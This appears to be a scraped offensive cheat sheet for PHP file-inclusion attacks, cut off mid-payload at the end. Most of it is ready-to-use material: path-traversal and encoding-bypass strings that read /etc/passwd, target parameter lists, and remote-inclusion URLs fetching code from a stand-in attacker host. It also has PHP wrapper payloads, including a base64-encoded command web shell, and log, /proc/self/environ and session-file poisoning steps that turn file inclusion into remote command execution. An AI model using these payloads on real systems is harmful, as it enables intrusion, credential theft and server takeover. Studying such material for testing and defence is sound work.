File Inclusion
Remote File Inclusion (RFI): The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include ).
Local File Inclusion (LFI): The sever loads a local file.
The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
Vulnerable PHP functions : require, require_once, include, include_once
Blind - Interesting - LFI2RCE files
Copy wfuzz - c - w . / lfi2 . txt --hw 0 http : // 10.10 . 10 . 10 / nav . php?page = . . / . . / . . / . . / . . / . . / . . / FUZZ Good wordlists for fuzzing
Basic LFI and Bypass Techniques
Copy http://example.com/index.php?page = . ./ . ./ . ./etc/passwd
#null byte
http://example.com/index.php?page = . ./ . ./ . ./etc/passwd%00
#encoding
http://example.com/index.php?page = .. %252f. . %252f. . %252fetc%252fpasswd
http://example.com/index.php?page = .. %c0%af. . %c0%af. . %c0%afetc%c0%afpasswd
http://example.com/index.php?page =%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page =%252e%252e%252fetc%252fpasswd%00
#filter bypass
http://example.com/index.php?page = ... .// ... .//etc/passwd
http://example.com/index.php?page = .... \ / .... \ / .... \ /etc/passwd
http://example.com/index.php?page = . ./////// . .//// . .//////etc/passwd
http://example.com/index.php?page =/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page =/var/www/ . ./ . ./etc/passwd #Maintain the initial path Top 25 parameters
Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link ):
Copy ?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload} Basic RFI
Copy http : // example . com / index . php?page = http : // atacker . com / mal . php
http : // example . com / index . php?page = \ \attacker.com\shared\mal.php LFI / RFI using PHP wrappers & protocols
php://filter
Copy # String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents ( "php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd" ) ;
## Same chain without the "|" char
echo file_get_contents ( "php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd" ) ;
## string.string_tags example
echo file_get_contents ( "php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala" ) ;
# Conversion filter
## B64 decode
echo file_get_contents ( "php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=" ) ;
## Chain B64 encode and decode
echo file_get_contents ( "php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd" ) ;
## convert.quoted-printable-encode example
echo file_get_contents ( "php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=" ) ;
= C2 = A3hellooo = 3 D
## convert.iconv.utf-8.utf-16le
echo file_get_contents ( "php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=" ) ;
# Compresion Filter
## Compress + B64
echo file_get_contents ( "php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd" ) ;
readfile ( 'php://filter/zlib.inflate/resource=test.deflated' ) ; #To decompress the data locally data://
Copy http://example.net/?page =data://text/plain, <?php echo base64_encode ( file_get_contents( "index.php" )); ? >
http://example.net/?page =data://text/plain, <?php phpinfo (); ? >
http://example.net/?page =data://text/plain ; base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4 =
http://example.net/?page =data:text/plain, <?php echo base64_encode ( file_get_contents( "index.php" )); ? >
http://example.net/?page =data:text/plain, <?php phpinfo (); ? >
http://example.net/?page =data:text/plain ; base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4 = expect://
Copy http://example.com/index.php?page =expect://id
http://example.com/index.php?page =expect://ls input://
Copy # Specify your payload in the POST parameters
http://example.com/index.php?page =php://input
POST DATA: < ?php system ( 'id' ); ? > More protocols
LFI2RCE
Log injection
If the Apache or Nginx server is vulnerable to LFI and you're able to reach the log file, set the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?> Vessel .
Default log paths:
Copy /var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log Via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
Copy GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: < ?=phpinfo (); ? > Via PHP sessions
Check if the website use PHP Session (PHPSESSID)
Copy Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27 ; path = /
Set-Cookie: user=admin ; expires = Mon, 13-Aug-2018 20:21:29 GMT ; path = / ; httponly Sessions are stored in /var/lib/php5/sess_[PHPSESSID] by default
Copy /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip | s:0: "" ; loggedin | s:0: "" ; lang | s:9: "en_us.php" ; win_lin | s:0: "" ; user | s:6: "admin" ; pass | s:6: "admin" ; Set the cookie to <?php system('cat /etc/passwd');?> or in POST data:
Copy login = 1 & user =< ?php system( "cat /etc/passwd" ); ?>& pass = password & lang = en_us.php Use the LFI to include the PHP session file
Copy login = 1 & user = admin & pass = password & lang = /../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8n 
